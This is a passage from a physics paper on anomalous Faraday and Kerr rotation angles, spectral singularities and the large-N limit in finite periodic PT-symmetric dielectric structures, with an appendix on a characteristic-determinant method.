when the transmission phase is in the range \(\varphi_{V}\in[\pi/4,\pi/2]\). Hence the critical value of \(\omega_{cr}\) is defined as \[\omega_{cr}=\frac{c}{|V|}\frac{\sqrt{n^{2}+n_{0}^{2}}}{\sqrt{|\cos 2\varphi_{V} |}}, \tag{20}\] provided that \[\cot\left(\frac{\omega_{cr}}{c}nL\right)=\frac{\sqrt{n^{2}+n_{0}^{2}}}{n} \frac{\cos\varphi_{V}}{\sqrt{|\cos 2\varphi_{V}|}}. \tag{21}\] For a fixed \(|V|\), as follows from Eq.(20) the solutions of spectral singularities can only be found in a finite range: \(\varphi_{V}\in[\frac{\pi}{4},\varphi_{c}]\), where \(\varphi_{c}\) stands for upper bound of range. Hence as \(\varphi_{V}\) approaches lower bound of range at \(\frac{\pi}{4}\), the spectral singularity solution occurs at large frequency: \(\omega\rightarrow\infty\). When \(\varphi_{V}\) is increased, the solution of spectral singularity moves toward lower frequencies. As \(\varphi_{V}\) approaches the upper bound of range at \(\varphi_{c}\), the spectral singularity solution thus reaches its lowest value. The graphical illustration of the distribution of spectral singularities can be found in Fig.2 in Ref. [17]. ### Faraday and Kerr rotation: transmitted and reflected light A phase transition-like anomalous behavior and properties of Faraday rotation angles in a simple \(\mathcal{PT}\)-symmetric model with two complex \(\delta\)-potential placed at both boundaries of a regular dielectric slab was most recently reported in Ref.[17]. Let us recall the essential features of the FR and then focus our attention on the KR effect. In a \(\mathcal{PT}\)-symmetric systems a phase transition-like anomalous behavior of Faraday rotation angle take place. In this phase, one of Faraday rotation angles turns negative, and both angles yield strong enhancement near spectral singularities. As the consequence of \(\mathcal{PT}\) symmetry constraint, the phase of reflected amplitude \(\psi^{R}\) from left coincides with the phase of the transmission amplitude \(\psi^{T}\), see Eq.(8). Hence the real part of the complex angle of KR, \(\theta_{1}^{R}\), is always equal to the \(\theta_{1}^{T}\) of FR, no matter what phase the system is in. In this sense, the situation is similar to the passive symmetric system, where is always \(\theta_{1}^{R}=\theta_{1}^{T}\). It is interesting to note that Eq.(15) is invariant under the symmetry transform: \(V_{2}\rightarrow-V_{2}\). This is a manifestation of the fact that the phase of reflected amplitude \(\psi^{R}\) and as well as the Kerr rotation angle for the right incident light preserve the same behaviour, although the strengths of the right and left \(\delta\)-potentials on the boundaries are not equal to each other (more precisely, they are complex conjugate to each other). The mentioned asymmetry should lead to different left-to-right and right-to-left reflection amplitudes (see, e.g., [30]) and does not affect physical quantities \(\theta_{1}^{R}\) and \(\theta_{1}^{T}\), which are related to the phase accumulated during the process of reflection and transmission and as well as to the density of states. However, this asymmetry will affect \(\theta_{2}^{R}\) and \(\theta_{2}^{T}\), and they will no longer be equal to each other, see Fig. 2(c) and Fig. 2(d). This is consistent with the general statement that the Faraday and Kerr rotation profiles are very different from the corresponding curves describing ellipticities. In addition, symmetry constraint also yields the wavelength dependence of Faraday and Kerr ellipticity \(\theta_{2}^{T}\) and \(\theta_{2}^{R^{\prime}/1}\) shown in Eq.(11). Here we would like to add a few more brief comments to emphasize that upon closer look at Fig.2 reveals some details of the similarities between curves that are relevant to our further discussion. Firstly, the Faraday (Kerr) rotation local maximum/minimum (see Fig. 2) coincide with the local peak on the ellipticity curves with some accuracy. The ellipticity, at that frequencies, approaches zero non-linearly, becomes zero (linearly polarized light), and then the resulting polarization reverses its original direction. Secondly, ellipticity (imaginary part the spectra) for \(\theta_{2}^{T}\) and \(\theta_{2}^{R}\) depend little on frequency and are close to zero in almost the entire frequency range, except for some regions associated with the maximum/minimum or spectral singularities of the Faraday rotation and Kerr rotation. The questions discussed above can be straightforwardly generalized for the periodic \(\mathcal{PT}\)-symmetric system. This will be done in the next section. We will show that the anomalous effect, similar to a phase transition, occurred more often due to the complex structure of the transmission and reflection amplitudes. ### Limiting cases The phase transition-like behavior of \(\theta_{1}^{T}\) for two limiting cases (\(|V|\rightarrow\infty\) and \(V_{1}\to 0\)) was discussed in Ref. [17]. It was shown that in the case of \(|V|\rightarrow\infty\) the sign of \(\theta_{1}^{T}\) is completely determined by \(\varphi_{V}\). As for the case \(V_{1}=0\) (\(\varphi_{V}\rightarrow\frac{\pi}{2}\)), then again for the given parameters of the problem the anomalous negative behavior of \(\theta_{1}^{T}\) is illustrated analytically. The latter case, that is a \(\mathcal{PT}\)-symmetric optical lattice with a purely imaginary scattering potential has been discussed in detail in a number of investigations both theoretically and experimentally, see, e.g. Refs. [30] and references therein. #### iii.3.1 \(|V|\rightarrow\infty\) The situation is slightly different for Kerr rotation. In the same limiting case \(|V|\rightarrow\infty\), given that \(\frac{n\omega L}{c}\neq\pi l\), we can show that \(\theta_{2}^{R}\propto\frac{1}{|V|^{2}}\), hence the ellipticity is almost zero for all frequencies excluding \(\frac{n\omega L}{c}=\pi l\) where \(l\in\mathbb{Z}\) and the reflected light remains linearly polarized. At the discrete values of \(\omega/c=\frac{\pi l}{mL}\) that yield the location of the resonance poles, \(\theta_{2}^{R}\) display sharp peak with narrow resonance width. It reflects the fact that the reflected light is again linearly polarized but rotated 90 degrees from the initial direction. #### iii.3.2 \(V_{1}\to 0\) Bound state solutions of the Schrodinger equation for a \(\mathcal{PT}\)-symmetric potential with Dirac delta functions was study in Ref.[31]. In Ref.[17] it was pointed out that despite the fact that the expression for \(\theta_{1}^{T}\) is valid for the case \(V_{1}\to 0\), it can still explain not only the sign change of \(\theta_{1}^{T}\) (\(\theta_{1}^{R}\)) in Fig.2 (a) where \(V_{1}\neq 0\), but also explain existence first local maximum. It is clear that further features of the \(\theta_{1}^{T}\) (\(\theta_{1}^{R}\)) in Fig. 3(a) near the frequencies of spectral singularities, is related to the behavior of \(T(\omega)\). As for the imaginary portion of Kerr effect \(\theta_{2}^{R^{r/l}}\), it is straightforward to show that in the same limit of \(V_{1}\to 0\) the \(\theta_{2}^{R^{r/l}}\) reads \[\theta_{2}^{R^{r/l}}\stackrel{{ V_{1}\to 0}}{{\rightarrow}}\frac{g}{2nQ( \omega)}\left[\frac{1}{2}\bigg{(}\frac{1}{n_{0}}+\frac{n_{0}}{n^{2}}\bigg{)} \mp\frac{\omega}{cn^{2}}V_{2}\bigg{(}1\mp\frac{\omega}{2cn_{0}}V_{2}\bigg{)}+ \frac{R_{0}^{r/l}}{Q^{r/l}(\omega)}\bigg{(}\frac{\omega L}{c}\frac{\cot(\frac {n\omega}{c}L)}{\sin^{2}(\frac{n\omega}{c}L)}-\frac{n^{2}-(n_{0}^{2}-\frac{ \omega^{2}}{c^{2}}V_{2}^{2})^{2}}{4n_{0}^{2}n^{3}}\bigg{)}\right], \tag{22}\] where the reflection coefficient \(R_{0}^{r/l}\) is given by Eq.(14) and \(Q^{r/l}(\omega)\) is defined by Eq.(18). The dependence of the imaginary part of the Kerr rotation \(\theta_{2}^{R^{r}}\) (solid black line) on \(\frac{\omega}{c}\) for \(V_{1}\to 0\) is illustrated in Fig. 3. A number of basic features of \(\theta_{2}^{R}\) can be observed even in this simplest case of \(V_{1}\to 0\). One of the key features is the single resonant peak that show up clearly when \(R_{0}\rightarrow\infty\), see Eq.(22). As mentioned above the resonance frequencies are spectral singularities when both conditions, \(\mathcal{R}(\omega)=0\) and \(\mathcal{I}(\omega)=0\), are satisfied simultaneously. In the particular case of \(V_{1}\to 0\) there is only one \(\omega_{cr}\) that can be directly calculated from Eq.(20) by putting \(\varphi_{V}=\frac{\pi}{2}\): \(\omega_{cr}=\frac{c\sqrt{n^{2}+n_{0}^{2}}}{V_{2}}\). The second condition \(\cot\left(\frac{\omega_{cr}}{c}nL\right)=0\) can be satisfied by choosing the appropriate value of length is \(L=0.8\) (the system parameters are: \(n_{0}=c=V_{2}=1\), \(n=\sqrt{2}\) and \(\omega_{cr}=\sqrt{3}\)). Other maxima or minima in the Kerr rotation, located near the resonant frequencies, are associated with multiple reflections from the boundaries and are located at \(\frac{\omega_{l}n}{c}L=\pi l,\ l=1,2,\cdots\) (see vertical pink lines in Fig.3). Repeating similar calculations leading to Eq.(22), we arrive at an explicit expression for ellipticity \(\theta_{2}^{T}\) for Faraday rotation for this simplest case with a purely imaginary potential: \[\theta_{2}^{T}\overset{V_{1}\to 0}{\overset{V_{1}\to 0}{\to}}\frac{g}{2n} \cot(kL)\frac{\omega}{c}L\left[T_{0}\left(1-\frac{\sin^{2}(kL)}{\cot(kL)}\frac {c}{\omega L}\frac{n^{2}-(n_{0}^{2}-\frac{\omega^{2}}{c^{2}}V_{2}^{2})^{2}}{4 n_{0}^{2}n^{3}}\right)-1\right]. \tag{23}\] We observe that the smoothed maxima and minima that appeared around the zeros of \(\sin kL\) at \(\frac{\omega_{l}n}{c}L=\pi l,\ l=1,2,\cdots\) coincides with maxima and minima of \(\theta_{2}^{R}\) and associated with multiple reflections from the boundaries, see e.g. vertical yellow lines in Fig.3. Secondly, the large value of \(\theta_{2}^{T}\) at \(3\pi/2\) is related to the frequency of the spectral singularity \(\omega_{cr}=\frac{c\sqrt{n^{2}+n_{0}^{2}}}{V_{2}}\), where \(T_{0}\rightarrow\infty\). The physical background of the relatively simple mathematical structure of the Faraday rotation angle \(\theta_{1}^{T}\) on the frequency of comparison Kerr ellipticity (\(\theta_{2}^{R^{r/l}}\) is that in the first case the rotation maximum is direct proportional to the optical anisotropy (for example, the larger ( \(n_{+}-n_{-}\) ), the larger is \(\theta_{1}^{T}\). However, the maximisation of \(\theta_{2}^{R^{r/l}}\) is, not so straightforward, since anisotropy indices are mixed (see, e.g, Ref. [32] and and references therein). ## IV Periodic system with \(2n+1\) cells It is known that when the wave propagation through a medium is described by a differential equation of second order, the expression for the total transmission from the finite periodic system for any waves (sound and electromagnetic) depends on the unit cell transmission, the Bloch phase and the total number of cells. As an example of collective interference effect, let us mention the intensity distribution from \(N\) slits (diffraction due to \(N\)-slits), as well as the formula that describes the Landauer's resistance of a one-dimensional chain of periodically spaced \(N\) random scatterers. In both cases, the similarity of the results is obvious. However, the physics behind these results is completely different both in spirit and in details. In analogy to Hermitian Hamiltonian, one can expect interference effect holds also for a non-Hermitian Hamiltonian system. In this sense it is a natural result for a \(\mathcal{PT}\)-symmetric system that a somewhat similar formula for transmission and reflection amplitudes appears, for example, in Refs. [29; 33; 34; 35]. The infinite periodic \(\mathcal{PT}\)-symmetric structures, because of unusual properties, including the band structure, Bloch oscillations, unidirectional propagation and enhanced sensitivity, are of special interest and are presently the subject of intensive ongoing research (see e.g., Refs. [36; 37; 38; 39] and references therein). However, the case of scattering in a finite periodic systems composed of an arbitrary number of cells/scatters has been less investigated, despite that any open quantum systems generally consist of a finite system coupled with an infinite environment. In many studies, to describe quantitatively, both amplification and absorption in periodic \(\mathcal{PT}\)-symmetric systems, the transfer matrix method is used. The latter, can be reduced to the evolution of the product of transfer matrices of complex, but identical unit cells, and using the classical Chebyshev identity get the final result. In the following, we present the amplitudes of transmission and reflection form the left and right sides of the incident wave based on the characteristic determinant approach, the technical details are given in Appendix A. The latter, in principle, is compatible with the transfer matrix method and is convenient for both numerical and analytical calculations. ### Amplitudes of transmission and reflection form left and right We now turn to a closer investigation of the Faraday and Kerr rotations for various parameter ranges of our \(\mathcal{PT}\)-periodic symmetric system that consists of \(2N+1\) cells, see Fig.1. Following Refs. [29; 40] and also see Appendix A, a generic expressions for the transmission and left/right reflection amplitudes for the \(\mathcal{PT}\) can be presented as: \[t(\omega)=\frac{e^{-ik_{0}L_{0}}}{\cos(\beta(2N+1)\Lambda)+iIm\left[\frac{e^{- ik_{0}L_{0}}}{t_{0}(\omega)}\right]\frac{\sin(\beta(2N+1)\Lambda)}{\sin(\beta \Lambda)}}, \tag{24}\] where \(k_{0}=n_{0}\frac{\omega}{c}\) and \(k=n\frac{\omega}{c}\) are the wave vectors in the respective medium. The quasi-momentum \(\beta\) is the Bloch wave vector of the infinite periodic system with unit cell length or spatial periodicity \(\Lambda=L_{0}+L\): \[\cos(\beta\Lambda)\equiv Re\left[\frac{e^{-ik_{0}L_{0}}}{t_{0}(\omega)}\right] =\sin(kL)\left[\cos(k_{0}L_{0})\mathcal{R}(\omega)-\sin(k_{0}L_{0}) \mathcal{I}(\omega)\right]. \tag{25}\] please confirm two equations in blue. The left/right reflection amplitude can be written in the form [29; 40] \[\frac{r^{(r/l)}(\omega)}{t(\omega)}=\left[\frac{r_{0}^{(r/l)}(\omega)}{t_{0}( \omega)}\right]\frac{\sin(\beta(2N+1)\Lambda)}{\sin(\beta\Lambda)}, \tag{26}\] where \(t_{0}(\omega)\) and \(r_{0}^{(r/l)}(\omega)\) are the transmission and reflection amplitudes for a single cell (\(N=0\)) that are given in Eq.(14) and Eq.(17) respectively. An important feature of expressions (24) and (26) is that both contain factor \(\frac{\sin(\beta(2N+1)\Lambda)}{\sin(\beta\Lambda)}\) which naturally occur in Hermitian one-dimensional finite periodic systems due to interference or diffraction effects and reflects a combine effect of all \(2N+1\) cell. The appearance of this factor in non-Hermitian systems is highly non-trivial from the view of the usual probability conservation property for Hermitian systems (the reflection and transmission coefficients must sum to unit in either classical or quantum mechanical regimes) or unitary scattering matrix theory. However, in Refs. [29; 33] a simple closed form expressions is obtained for the total transmission and reflection (left/right) amplitudes from a lattice of \(N\) cells. As pointed out in Refs. [29], the transmission and reflection amplitudes for a periodic many scatters system are related to single cell amplitudes in a compact fashion. This is intimately connected with the fact that the factorization of short-range dynamics in a single cell and long-range collective effect of periodic structure of entire system: the short-range interaction dynamics that is described by single cell scattering amplitudes and the \(\beta\) represents the collective mode of entire lattice. The occurrence of factorization of short-range dynamics and long-range collective mode has been known in both condensed matter physics and nuclear/hadron physics. In the cases such as particles interacting with short-range potential in a periodic box or trap, where two physical scales, (1) the short-range particles dynamics and (2) long-range geometric effect due to the periodic box or trap, are clearly separated. The quantization conditions are given by a compact formula that is known as Korringa-Kohn-Rostoker (KKR) method [41; 42] in condensed matter physics, Luscher formula [43] in LCQD and Busch-Englert-Rzazewski-Wilkens (BERW) formula [44] in a harmonic oscillator trap in nuclear physics community. Other related useful discussions can be found in e.g. Refs.[45; 46; 47; 48]. Above statement can also be demonstrated by the expression of transmission coefficient \(T=|t|^{2}\) for the finite system with \(2N+1\) cells, \[\frac{1}{T}=1+\frac{r_{0}^{r}}{t_{0}}\frac{{r_{0}^{l}}^{*}}{{t_{0}}^{*}}\frac {\sin^{2}(\beta(2N+1)\Lambda)}{\sin^{2}(\beta\Lambda)}=1+\bigg{(}\frac{1}{T_{0} }-1\bigg{)}\frac{\sin^{2}(\beta(2N+1)\Lambda)}{\sin^{2}(\beta\Lambda)}. \tag{27}\] In addition, Equation (27) shows that there are two distinct cases for which an incident wave is totally transmitted, i.e. \(T=1\). This implies perfect resonant transmission with no losses and no gain, regardless of the complex nature of the coupling constants. The first case occurs when there is no reflected wave from any individual cell and this matches the condition when the product of \(\frac{r_{0}^{r}}{t_{0}}\frac{{r_{0}^{l}}^{*}}{{t_{0}}^{*}}\) in Eq. (27) is zero (or \(T_{0}=1\)). This would lead to the unidirectional propagation discussed in several studies on \(\mathcal{PT}\)-symmetric systems, see, e.g, Refs. [49; 50; 51; 52]. This phenomenon is also referred as the effect of exceptional points (EPs) that separate the broken and unbroken \(\mathcal{PT}\)-symmetric phases, see e.g. Refs. [53; 54; 55; 56]. In the second case \(\sin(\beta(2N+1)\Lambda)/\sin(\beta\Lambda)=0\). It corresponds to constructive interference between path reflected from different unit cells at \[\beta\Lambda=\frac{\pi l}{2N+1},\qquad|l|=1,\cdots,N. \tag{28}\] In both cases mentioned, we have a perfect transmission, that is, \(T=1\). As a consequence, the product of two the reflection coefficients on the left and right should disappear according to the formula (9). In the case, when one of reflections reach zero while the other remains non-zero, so-called unidirectional transparency can occur when we have an ideal non-reflective transmission in one direction but not in the other. The experimental demonstration of a unidirectional reflectionless at optical parity-time metamaterial at optical frequencies is reported in Ref. [50]. An outlook on the potential directions and applications of controlling sound in non-hermitian acoustic systems can be found in Ref.[57]. ### Spectral singularities in periodic system with \(2n+1\) cells To illustrate the influence of the two factors mentioned above, as well as the role of spectral singularities on the formation of Faraday and Kerr rotations and their shapes let us note that (i) the spectral singularities arise when both conditions, \(Re(\omega)=\theta\) and \(Im(\omega)=0\), are satisfied simultaneously (ii) the location of these poles can be found by solving \(1/t(k)=0\). Based on Eq.(24), there are two types of solutions, as was mentioned above: (i) Type I singularities are given by solutions of \(\frac{1}{t_{0}(\omega)}=0\). Hence \(\cos(\beta\Lambda)=0\) and \(\frac{1}{t(\omega)}=0\) are both automatically satisfied: \[\beta\Lambda=\pi l+\frac{\pi}{2},\ \ \ \ l\in\mathbb{Z}. \tag{29}\] The type I singularities are originated from a single cell (\(N=0\)), and shared by the entire system of \(2N+1\) cells. The type I solutions are independent of number of cells and the size of system. The detailed discussion about type I singularities can be found in Sec.III.1. (ii) type II singularities depend on the size of the system and are given by two conditions, \[\cos\left(\beta(2N+1)\Lambda\right)=0,\ \ \ \ Im\left[\frac{e^{-ik_{0}L_{0}}}{t_{0}(k )}\right]=0. \tag{30}\] Hence \(\beta\Lambda=\frac{\pi(l+\frac{1}{2})}{2N+1}\) where \(l\in\mathbb{Z}\), above two conditions are given explicitly by \[\sin\left(\frac{n\omega_{cr}}{c}L\right)\left[\cos\left(\frac{n_{ 0}\omega_{cr}}{c}L_{0}\right)\mathcal{R}(\omega_{cr})-\sin\left(\frac{n_{0} \omega_{cr}}{c}L_{0}\right)\mathcal{I}(\omega_{cr})\right] =\cos\frac{\pi(l+\frac{1}{2})}{2N+1},\] \[\cos\left(\frac{n_{0}\omega_{cr}}{c}L_{0}\right)\mathcal{I}( \omega_{cr})+\sin\left(\frac{n_{0}\omega_{cr}}{c}L_{0}\right)\mathcal{R}( \omega_{cr}) =0. \tag{31}\] At the limit of \(V_{1}\to 0\), two conditions are reduced to \[\frac{V_{2}^{2}\omega_{\omega_{cr}}^{2}}{2c^{2}nn_{0}}-\tan\left(\frac{n_{0} \omega_{cr}L_{0}}{c}\right)\cot\left(\frac{n\omega_{cr}L}{c}\right)=\frac{1}{2 }\left(\frac{n_{0}}{n}+\frac{n}{n_{0}}\right),\ \ \ \cos\frac{\pi(l+\frac{1}{2})}{2N+1}=\frac{\cos\left(\frac{n\omega_{cr}L}{c} \right)}{\cos\left(\frac{n\omega_{cr}L_{0}}{c}\right)} \tag{32}\] ### Large \(N\) limit As number of cells is increased, all FR and KR angles demonstrate fast oscillating behavior due to \(\sin(\beta(2N+1)\Lambda)\) and \(\cos(\beta(2N+1)\Lambda)\) functions in transmission and reflection amplitudes. These behaviors are very similar to what happens for tunneling time of a particle through layers of periodic \(\mathcal{PT}\)-symmetric barriers that is discussed in Ref. [29]. For the large \(N\) systems, we can introduce the FR and KR angles per unit cell \[\widehat{\theta}^{T/R}(\omega)=\frac{\theta^{T/R}(\omega)}{(2N+1)\Lambda}. \tag{33}\] The \(N\rightarrow\infty\) limit may be approached by adding a small imaginary part to \(\beta\): \(\beta\rightarrow\beta+i\epsilon\), where \(\epsilon\gg\frac{1}{(2L+1)\Lambda}\). As discussed in Ref. [29], adding a small imaginary part to \(\beta\) is justified by considering the averaged FR and KR angles per unit cell, which ultimately smooth out the fast oscillating behavior of FR and KR angles. Using asymptotic behavior of \[\sec(\beta(2N+1)\Lambda)\propto 2e^{i\beta(2N+1)\Lambda},\ \ \ \ \tan(\beta(2N+1)\Lambda)\propto 1, \tag{34}\] we find \[\frac{1}{(2N+1)\Lambda}\ln t(\omega)\stackrel{{ N \rightarrow\infty}}{{\rightarrow}}i\beta,\ \ \ \ \ \frac{1}{(2N+1)\Lambda}\ln r(\omega)\stackrel{{ N \rightarrow\infty}}{{\rightarrow}}0. \tag{35}\] Therefore, as \(N\to\infty\), FR and KR angles per unit cell approach \[\widehat{\theta}_{1}^{T}\overset{N\to\infty}{\to}-\frac{g}{2n}\frac{\partial Re[ \beta]}{\partial n},\hskip 14.226378pt\widehat{\theta}_{2}^{T}\overset{N\to \infty}{\to}\frac{g}{2n}\frac{\partial Im[\beta]}{\partial n},\hskip 14.226378pt \widehat{\theta}_{1,2}^{R^{r/l}}\overset{N\to\infty}{\to}0. \tag{36}\] Also noted that at large \(N\) limit, \[\sin(\beta(2N+1)\Lambda)\propto-\frac{1}{2i}e^{-i\beta(2N+1)\Lambda}\overset{ N\to\infty}{\to}\infty, \tag{37}\] using Eq.(27), one can show that transmission coefficient therefore approaches zero: \(T\overset{N\to\infty}{\to}0\). The relation between \(\widehat{\theta}_{2}^{T}\) and \(\widehat{\theta}_{2}^{R^{r/l}}\) given in Eq.(11) hence is still valid as \(N\to\infty\). The examples of FR and KR angles per unit cell for a\(\mathcal{PT}\)-symmetric finite system with five cells are shown in Fig. 4 and Fig. 5, compared with the large \(N\) limit results. As we can see in Fig. 4 and Fig. 5, the \(\theta_{1}^{T}\) and \(\theta_{2}^{T}\) angles oscillating around the large \(N\) limit results. Even for the small size system, we can see clearly that the band structure of infinite periodic system is already showing up. The oscillating KR angles are consistent with zero at large \(N\) limit. In addition, in broken \(\mathcal{PT}\)-symmetric phase in Fig. 5, EPs can be visualized even for a small size system, where two neighbouring bands merge and the \(\mathcal{PT}\) becomes totally transparent: both \(\theta_{1}^{T}\) and \(\theta_{2}^{T}\) approach zero. For a real refractive index profile, the sign of \(\theta_{1}^{T}\) is always positive due to the fact that \(\theta_{1}^{T}\) is closely related to the density of states. However, in \(\mathcal{PT}\)-symmetric systems, \(\theta_{1}^{T}\) is now associated with a generalized density of states, which can be either positive or negative, see discussion in Ref.[24; 29]. In this sense the negative spike(s) in Fig. 4 and Fig. 5 around the some frequencies provide the formal justification of the existence of such negative states. Turning negative of \(\theta_{1}^{T}\) is closely related to the motion of poles across the real axis moving from unphysical sheet (the second Riemann sheet) into physical sheet (the first Riemann sheet), for more details see Refs.[29; 58]. Since \(\theta_{1}^{T}\) (\(\theta_{1}^{R}\)) is assumed to be related to the density of states, it is natural that it is practically zero in all forbidden bands and takes a giant leap to a very large number at the end of each band. ## V Discussion and Summary In summary, we studied the anomalous behavior of the Faraday (transmission) and polar Kerr (reflection) rotation angles of the propagating light, in finite periodic parity-time (\(\mathcal{PT}\)) symmetric structures, containing \(2N+1\) cells. We have obtained closed form expressions for FR and KR angles for a single cell consisting of two complex \(\delta\)-potentials placed on both boundaries of the ordinary dielectric slab. It is shown that, for a given set of parameters describing the system, a phase transition-like anomalous behavior of Faraday and Kerr rotation angles in a parity-time symmetric systems can take place. In the anomalous phase the value of one of the Faraday and Kerr rotation angles can become negative, and both angles suffer from spectral singularities and give a strong enhancement near the singularities. It is shown that due to symmetry constraints, the real part of the complex angle of KR, \(\theta_{1}^{R}\), is always equal to the \(\theta_{1}^{T}\) of FR, no matter what phase the system is in. The imaginary part of KR angles \(\theta_{2}^{R^{r/l}}\) are also related to the \(\theta_{2}^{T}\) of FR by parity-time symmetry. We find that, in the limit of weak scattering, the Kerr and Faraday rotation angles increase linearly with the length of the system. In this approximation the effects of multiple reflections within the layers are not significant. We have also shown, based on the modified Kramers-Kronig relations, that only the three angles FR and KR are completely independent. ###### Acknowledgements. P.G. and V.G. acknowledge support from the Department of Physics and Engineering, California State University, Bakersfield, CA. V.G., A.P-G. and E.J. would like to thank UPCT for partial financial support through the concession of "Maria Zambrano ayudas para la recualificacion del sistema universitario espanol 2021-2023" financed by Spanish Ministry of Universities with financial funds "Next Generation" of the EU. ## Appendix A Determinant Approach This section is devoted to more mathematical interest. We combine two non-perturbative approaches, that sufficiently completely describe of photon (electron) behaviour in a random potential to study the energy spectrum and scattering matrix elements in the \(\mathcal{PT}\) system without actually determining the photon eigenfunctions. In both approaches, the Green's function was calculated exactly for two different models. In the first model, we are dealing with the sum of \(\delta\)-potentials distributed randomly with an arbitrary strength. The second model was used to calculate the passage of a free particle through a layered system, which is characterized by random parameters of the layers. A convenient formalism to study one dimensional scattering systems satisfying the stationary Schrodinger equation or the Helmholtz equation relevant to optical Bragg grating is developed in Ref [59; 60]. The approach allows one to express the transmission and reflection amplitudes of a wave propagating in a one-dimensional random layered structure through the characteristic determinant \(D_{N}\) (\(N\) is the number of the boundaries), which depends on the amplitudes of reflection of a single scatter only. The transmission amplitude \(t_{N}\) of waves through the systems can be presented in the form \[t_{N}=\frac{e^{ik|x_{N}-x_{1}|}}{D_{N}^{0}}, \tag{10}\] where the characteristic determinant \(D_{N}^{0}\) reduces to a recursive equation that is convenient for both numerical and analytical approaches. This paper presents a generalization of the determinant approach to the case of \(\mathcal{PT}\)-symmetric (non-symmetric) systems consisting of \((N-1)\) dielectric multilayers with two delta potentials in each. The detailed and, in many respects, complete description and analysis of the Faraday and Kerr effects in such a system discussed. Specifically, our investigations focus on the periodic finite size diatomic \(\mathcal{PT}\)-symmetric model. We predict that for a given set of parameters describing the system the Faraday and Kerr rotation angles show a non-trivial transition with a change in sign. In the anomalous phase the value of one of the Faraday and Kerr rotation angles can become negative, and both angles suffer from spectral singularities and give a strong enhancement near the singularities. Let us consider \((N-1)\) dielectric multilayer system labeled \(n=1,\cdots,N-1\) between two semi-infinite media. The positions of the boundaries of the \(nth\) dielectric layer, characterized by the constant \(\epsilon_{n}\), are given by \(x_{n}\) and \(x_{n+1}\) respectively. The left and right ends of the system are at \(x=x_{{}_{N}}\) and \(x=x_{1}\) with \(\epsilon_{0}=\epsilon_{N}\), respectively. We assume that a plain EMW wave is incident from the left (with the dielectric permittivity \(\epsilon_{0}\)) onto the boundary at \(x=x_{1}\) and evaluate the amplitude of the reflected wave and the wave propagating in the semi-infinite media for \(x>x_{N}\), characterized by \(\epsilon_{N}\). In the further discussion we will assume, that the first and last layers of the multilayer system make interfaces with the vacuum. We also assume that we know the transmission \(t_{n,n+1}\) and reflection amplitudes (from the left \(r_{n,n+1}\) and the right \(r_{n+1,n}\)) of the EMW from a single \(Z_{n}\delta(x-x_{n})\) scatter, located at the contact of two semi-infinite media I and II at \(x=x_{n}\). Using the results of the transmission and reflection amplitudes for the single scatter, we will build characteristic determinant \(D_{N}\) for \(N\) scatters and obtain the total transmission \(t_{N}\) and reflection amplitudes \(r_{L}^{N}\) and \(r_{R}^{N}\). The transmission amplitudes from left and from right equal each other are given by \[t_{n,n+1}=t_{n+1,n}\equiv\frac{2\sqrt{\frac{k_{n}}{k_{n-1}}}}{1+\frac{k_{n}}{k_{n -1}}-i\frac{\gamma}{k_{n-1}}Z_{n}},\hskip 14.226378ptk_{n}=\frac{\omega}{c}n, \hskip 14.226378pt\gamma\equiv\left(\frac{\omega}{c}\right)^{2}. \tag{14}\] Similarly, \[r_{n,n+1}=\frac{1-\frac{k_{n+1}}{k_{n}}+i\frac{\gamma}{k_{n}}Z_{n}}{1+\frac{k_{ n+1}}{k_{n}}-i\frac{\gamma}{k_{n}}Z_{n}},\hskip 14.226378ptr_{n+1,n}=\frac{\frac{k_{n+1}}{k_ {n}}-1+i\frac{\gamma}{k_{n}}Z_{n}}{1+\frac{k_{n+1}}{k_{n}}-i\frac{\gamma}{k_{n }}Z_{n}}. \tag{15}\] We can easily verify by using Eq.(14) and Eq.(15) that the conservation law is satisfied, provided that \(Z_{n}\) is real: \[t_{n,n+1}t_{n,n+1}^{*}+r_{n,n+1}r_{n,n+1}^{*}=\frac{4\frac{k_{n}}{k_{n-1}}+(1- \frac{k_{n}}{k_{n-1}})^{2}+(\frac{\gamma}{k_{n-1}}Z_{n})^{2}}{(1+\frac{k_{n}} {k_{n-1}})^{2}+(\frac{\gamma}{k_{n-1}}Z_{n})^{2}}=1 \tag{16}\] In the case of a complex value \(Z_{n}\), the conservation law cannot hold, since the system is not \(\mathcal{PT}\)-symmetric and can be described by only complex energy eigenvalue. Later, when we "build" the characteristic determinant \(D_{N}\) for the entire system with \(N\) complex potentials, distributed arbitrary, we will return to the conservation law of the system in more detail. Assuming that we know the explicit expression for the amplitude of reflection from a single-scattering delta potential, see Eq.(15), we now turn to a closer investigation of the system with two complex potentials. Following Refs.[59], we can present the determinant \(D_{2}\) of two delta potentials located at points \(x_{1}\) and \(x_{2}\) (\(L=x_{2\text{-}}\)\(x_{1}\)) on the left and right boundaries of a dielectric slab surrounded by two semi-infinite media with permittivities \(\epsilon_{0}\) (left) and \(\epsilon_{2}\) (right), respectively. The dielectric slab itself is characterized by permittivity \(\epsilon_{1}\). The explicit form of \(D_{2}\) is \[D_{2}^{0}=\frac{1}{(1+r_{21})(1+r_{32})}\det D_{2}, \tag{17}\] where \[\det D_{2}\equiv\left|\begin{matrix}1&r_{23}e^{ik_{1}(x_{2}-x_{1})}\\ r_{21}e^{ik_{1}(x_{2}-x_{1})}&1\end{matrix}\right|, \tag{18}\] and \(r_{n,n+1}\) is given by Eq.(15) with the appropriate choice of \(n\) and \(Z_{n}\). Let us add another boundary from the right, at the point \(x_{3}\), i.e. we consider a layered heterostructure consisting of two films with permittivities \(\epsilon_{1}\) and \(\epsilon_{2}\), placed between two semi-infinite media \(\epsilon_{0}\) and \(\epsilon_{3}\). Next, adding another delta complex potential \(Z_{3}\) at \(x_{3}\) the new \(D_{3}\), which now is \(3\times 3\) determinant, can be written as \[D_{3}^{0}=\prod_{l=1}^{3}\frac{1}{(1+r_{l+1,l})}\det D_{3} \tag{19}\] where \[\det D_{3}\equiv\left|\begin{matrix}1&r_{23}e^{ik_{1}(x_{2}-x_{1})}&r_{34}e^ {ik_{1}(x_{2}-x_{1})}e^{ik_{2}(x_{3}-x_{2})}\\ r_{21}e^{ik_{1}(x_{2}-x_{1})}e^{ik_{2}(x_{3}-x_{2})}&r_{32}e^{ik_{2}(x_{3}-x_{ 2})}&1\end{matrix}\right|. \tag{20}\] By continuing adding new boundaries and complex potential \(Z_{n}\) at the points \(x_{4}\),..., \(x_{N}\), we will obtain an \(N\)-multilayer system, each layer of which contains two delta potentials. This system will be characterized by the product of \(N\) by \(N\) determinant \(D_{N}\) 